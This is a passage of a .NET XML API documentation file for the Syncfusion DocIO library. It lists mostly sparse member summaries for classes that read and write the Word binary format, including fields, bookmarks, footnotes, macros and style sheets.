            Writes the end of the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationWriter.WriteItemStart">
            <summary>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordAnnotationWriter.IncreaseCcp(System.Int32)">
            <summary>
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordEndnoteWriter">
            <summary>
            Summary description for footnote subdocument writer
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordEndnoteWriter"/> class.
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteWriter.WriteItemStart">
            <summary>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteWriter.WriteDocumentEnd">
            <summary>
            Writes the end of the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordEndnoteWriter.IncreaseCcp(System.Int32)">
            <summary>
            
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.DEF_TEXTBOX_RESERVED_DATA">
            <summary>
            Textbox reserved data
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.m_lastTxbxPosition">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.m_txbxBkDCnt">
            <summary>
            BreakDescriptor counter
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.m_dataPosition">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter"/> class.
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.WriteDocumentEnd">
            <summary>
            Writes the end of the document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.WriteItemEnd">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.WriteTextBoxEnd(System.Int32)">
            <summary>
            
            </summary>
            <param name="spid">Spid of textbox.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.IncreaseCcp(System.Int32)">
            <summary>
            Increase ccp on the defined length
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordTextBoxWriter.AddNewTxbx(System.Boolean,System.Int32)">
            <summary>
            
            </summary>
            <param name="isLast"></param>
            <param name="spid"></param>    
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxWriter.#ctor(Syncfusion.DocIO.ReaderWriter.WordWriter)">
            <summary>
            Creates subdocument reader of specified type.
            </summary>
            <param name="mainWriter"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxWriter.WriteHFTextBoxEnd(System.Int32)">
            <summary>
            Write textbox "end"
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxWriter.IncreaseCcp(System.Int32)">
            <summary>
            Increase header/footer ccp
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordHFTextBoxWriter.AddNewTxbx(System.Boolean,System.Int32)">
            <summary>
            Create TxbxStory and BKD and add it to artObjects
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WordWriter">
            <summary>
            Summary description for WordWriter.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_bLastParagrapfEnd">
            <summary>
            Is Last ParagraphEnd for the subdocument
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_secProperties">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_lastWriter">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_builtinProp">
            <summary>
            Document summary properties members
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_customProp">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_isTemplate">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_bIsWriteProtected">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WordWriter.m_bHasPicture">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.#ctor(System.IO.Stream)">
            <summary>
            Creates instance from specified stream
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.#ctor(System.String)">
            <summary>
            Creates instance from specified file name
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteDocumentHeader">
            <summary>
            Writes header of the document to word file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.GetSubdocumentWriter(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Gets the subdocument writer of the specified type
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteChunk(System.String)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteSafeChunk(System.String)">
            <summary>
            
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteMarker(Syncfusion.DocIO.ReaderWriter.WordChunkType)">
            <summary>
            
            </summary>
            <param name="chunkType"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteDocumentEnd(System.String,System.String,System.UInt16,System.Collections.Generic.Dictionary{System.String,Syncfusion.DocIO.ReaderWriter.DataStreamParser.OLEObject.Storage})">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.InsertComment(Syncfusion.DocIO.DLS.WCommentFormat)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.InsertFootnote(Syncfusion.DocIO.DLS.WFootnote)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.InsertPageBreak">
            <summary>
            Writes marker to word file
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.CompleteMainStream">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteZeroBlock(System.Int32)">
            <summary>
            Writes the zero block.
            </summary>
            <param name="size">The size.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteTables(System.String)">
            <summary>
            Writes the tables.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteSummary">
            <summary>
            Create Summary information for document.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteProps(Syncfusion.CompoundFile.DocIO.Net.PropertySection,System.Collections.ICollection)">
            <summary>
            
            </summary>
            <param name="section"></param>
            <param name="values"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.ConvertToPropertyData(Syncfusion.DocIO.DLS.DocumentProperty,System.Int32)">
            <summary>
            
            </summary>
            <param name="property"></param>
            <param name="iPropertyId"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.AddSepxProperties">
            <summary>
            Adds the sepx properties.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.Close">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.InitClass">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.IncreaseCcp(System.Int32)">
            <summary>
            
            </summary>
            <param name="dataLength"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WordWriter.Dispose">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.SectionProperties">
            <summary>
            Gets/sets section properties 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.BuiltinDocumentProperties">
            <summary>
            Get/sets name of the author of the application.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.CustomDocumentProperties">
            <summary>
            Get/sets name of the author of the application.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.DOP">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.GrammarSpellingData">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.MacrosStream">
            <summary>
            Get/set document Macros
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.ObjectPoolStream">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.MacroCommands">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.Variables">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.StandardAsciiFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.StandardFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.StandardBidiFont">
            <summary>
            Gets and sets the standard/default bidi font
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.StandardNonFarEastFont">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.IsTemplate">
            <summary>
            Gets or sets a value indicating whether the document is template.
            </summary>
            <value>
            	<c>true</c> if this instance is template; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.AssociatedStrings">
            <summary>
            Gets or sets the associated strings.
            </summary>
            <value>The associated strings.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.WriteProtected">
            <summary>
            Gets or sets a value indicating whether the document is write protected.
            </summary>
            <value><c>true</c> if [write protected]; otherwise, <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WordWriter.HasPicture">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WPStylesData">
            <summary>
            Summary description for WPStylesData.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPStylesData.m_tablesData">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPStylesData.#ctor(Syncfusion.DocIO.ReaderWriter.WPTablesData)">
            <summary>
            Initializing constructor
            </summary>
            <param name="tables"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPStylesData.GetStyleRecordByID(System.Int32)">
            <summary>
            Gets style defintion record by the specified style id
            </summary>
            <param name="styleID"></param>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPStylesData.StyleSheetInfo">
            <summary>
            Gets stylesheet information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPStylesData.StyleDefinitions">
            <summary>
            Gets stylesheet definitions
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.ReaderWriter.WPTablesData">
            <summary>
            Summary description for WPTablesData.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.DEF_TABLESTREAM_NAME">
            <summary>
            Default name for table stream.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.EXC_NOTREAD_TABLE_MESS">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_escher">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_fib">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_sectionTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_pieceTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_ffnStringTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_bkmkStringTable">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_bkmkDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_binTableCHPX">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_binTablePAPX">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_listInfo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_charPosTableHF">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_styleSheetInfo">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_arrStyleDefinitions">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_pieceTablePositions">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_pieceTableEncodings">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_dopDescriptor">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_artObjects">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_anotations">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_footnotes">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_endnotes">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_fields">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_clxModifiers">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_standardAsciiFont">
            <summary>
            
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_standardBidiFont">
            <summary>
            Represents the default CS/Bidi font
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.ReaderWriter.WPTablesData.m_grammarSpellingTablesData">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.#ctor(Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.ReaderWriter.WPTablesData"/> class.
            </summary>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.Read(System.IO.Stream)">
            <summary>
            Read structures from stream
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.Write(System.IO.Stream,System.Boolean,System.String)">
            <summary>
            Write member structures to stream
            </summary>
            <param name="stream"></param>
            <param name="hasSubDocument"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ConvertCharPosToFileCharPos(System.UInt32)">
            <summary>
            Converts position in text to position in file
            </summary>
            <param name="charPos"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.GetBookmarks">
            <summary>
            Gets array of bookmarks from the document
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.AddSectionRecord(System.Int32,System.Int32)">
            <summary>
            Add section record
            </summary>
            <param name="charPos"></param>
            <param name="sepxPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.AddPapxRecord(System.UInt32,System.Int32)">
            <summary>
            Add papx record
            </summary>
            <param name="charPos"></param>
            <param name="papxPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.AddChpxRecord(System.UInt32,System.Int32)">
            <summary>
            Add chpx record
            </summary>
            <param name="pos"></param>
            <param name="chpxPos"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.AddStyleSheetTable(Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
            <param name="styleSheet"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadFFNTable(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="fib"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.GetEncodingByFC(System.Int64)">
            <summary>
            
            </summary>
            <param name="position"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ConvertFCToCP(System.UInt32)">
            <summary>
            
            </summary>
            <param name="fc"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.HasSubdocument(Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Determines whether the document has the specified type of subdocument.
            </summary>
            <param name="wsType">Type of the subdocument.</param>
            <returns>
            <c>true</c> if the specified ws type has subdocument; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.HasList">
            <summary>
            Determines whether this instance has list.
            </summary>
            <returns>
            <c>true</c> if this instance has list; otherwise, <c>false</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.AddFFNTable(Syncfusion.DocIO.ReaderWriter.WordStyleSheet)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteFFNTable(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteStyleSheet(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteShort(System.IO.Stream,System.UInt16)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="val"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadStyleSheet(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadStyleSheetTable(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadStylesDefinitions(System.IO.Stream,System.Int64)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <param name="lNextBlockStart"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.GenerateTables(System.Boolean)">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.NormalizeFileCharPos(System.UInt32,System.Boolean@)">
            <summary>
            
            </summary>
            <param name="fileCharPos"></param>
            <param name="bIsUnicode"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadComplexPart(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadUInt16(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadUInt32(System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="stream"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadLists(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteDocumentProperties(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Writes the document properties.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadDocumentProperties(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteFields(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.WordSubdocument)">
            <summary>
            Writes the fields.
            </summary>
            <param name="stream">The stream.</param>
            <param name="subDocument">The sub document.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadFields(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteBookmarks(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Writes the bookmarks.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadBookmarks(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ParsePieceTableEncodings">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadArtObjects(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadAnnotations(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadFootnotes(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadEndnotes(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteArtObjects(System.IO.Stream,Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Writes the art objects.
            </summary>
            <param name="stream">The stream.</param>
            <param name="fib">The fib.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteAnnotations(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteFootnotes(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteEndnotes(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Writes the endnotes.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.SynchronizeSpids(Syncfusion.DocIO.ReaderWriter.DataStreamParser.Escher.ContainerCollection,System.Collections.IDictionaryEnumerator)">
            <summary>
            /
            </summary>
            <param name="collection"></param>
            <param name="mainEnumerator"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadMacroCommands(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteMacroCommands(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Writes the macro commands.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadGrammarSpellingData(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteGrammarSpellingData(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            
            </summary>
            <param name="fib"></param>
            <param name="stream"></param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ContainShapes(Syncfusion.DocIO.ReaderWriter.Fib)">
            <summary>
            Contains the shapes.
            </summary>
            <param name="fib">The fib.</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadVariables(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Reads the variables.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteVariables(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Writes the variables.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadAssocStrings(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Reads the table of associated strings.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.ReadSttbfRMark(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Reads the STTBF r mark.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteAssocStrings(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream)">
            <summary>
            Writes the associated strings.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteSttbfRMark(Syncfusion.DocIO.ReaderWriter.Fib,System.IO.Stream,System.String)">
            <summary>
            Writes the STTBF r mark.
            </summary>
            <param name="fib">The fib.</param>
            <param name="stream">The stream.</param>
            <param name="author">The author.</param>
        </member>
        <member name="M:Syncfusion.DocIO.ReaderWriter.WPTablesData.WriteRmdThreading(System.IO.Stream)">
            <summary>
            Writes the RMD threading.
            </summary>
            <param name="stream">The stream.</param>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.ArtObj">
            <summary>
            Get artobject's object
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Annotations">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Footnotes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.Endnotes">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.SectionsTable">
            <summary>
            Gets sections table.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.FFNStringTable">
            <summary>
            Gets/sets FontFamilyNameStringTable 
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.StyleSheetInfo">
            <summary>
            Gets/sets stylesheet information
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.StyleDefinitions">
            <summary>
            Gets/sets array of style definition records.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.ReaderWriter.WPTablesData.HeaderFooterCharPosTable">
            <summary>
